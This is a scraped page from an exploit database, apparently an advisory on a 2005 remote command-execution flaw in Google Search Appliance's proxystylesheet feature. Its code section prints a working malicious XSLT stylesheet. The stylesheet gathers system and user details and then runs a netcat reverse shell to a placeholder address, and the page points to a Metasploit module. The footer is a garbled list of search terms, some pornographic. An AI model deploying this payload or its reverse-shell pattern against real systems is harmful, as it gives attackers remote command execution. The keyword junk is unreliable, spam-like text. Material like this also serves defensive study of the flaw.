exploits , vulnerabilities , articles , Google Search Appliance ProxyStyleSheet Multiple Remote Vulnerabilities
| Title |
Google Search Appliance ProxyStyleSheet Multiple Remote Vulnerabilities |
| Published |
2005-11-21-12:00AM |
| Updated |
2005-11-21-06:45PM |
| Class |
Design Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
H D Moore <hdm@metasploit.com> is credited with the discovery of these issues. |
| Vulnerable |
Google Search Appliance
Google Mini Search Appliance |
| Not Vulnerable |
|
| Code |
An exploit is not required to leverage these issues. An example style sheet sufficient to execute commands has been provided:
<xsl:template
name="my_page_footer"
xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime"
>
<!-- Google Mini XSLT Code Execution [metasploit] -->
XSLT Version: <xsl:value-of select="system-property('xsl:version')"/> <br />
XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br />
OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br />
Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br />
UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br />
UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br />
UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br />
Executing command...<br />
<xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" />
</span>
</xsl:template>
An exploit for the Metasploit Framework is also available:
/data/vulnerabilities/exploits/google_proxystylesheet_exec.pm
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Sat, 19 Dec 2009 03:11:18 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
santa clau maxcpm.inf avast pro SendMail maxcpm.inf Bind 9 news for c www.29vv.c oepnssh 3. 2_F_ /phpnuke WWW. Doodh sgl Free xxxmo udp port 4 www tamils twilightwa www tamils news for c news for C search/exp six vido aechat.php Nude pregn xxx porno www.vidio news for c Sex gril. Sex gril. phpbb inde /view body CARMANELET My_eGaller %2Fcheckou vidoes] 002276+585 Video de n php-nuke 2 Www.free+s Sex mariam www.incest news for c news for C Crack Data t757t vuln/explo ogg 200 /compo Yahoo Mess indionxxx.
|
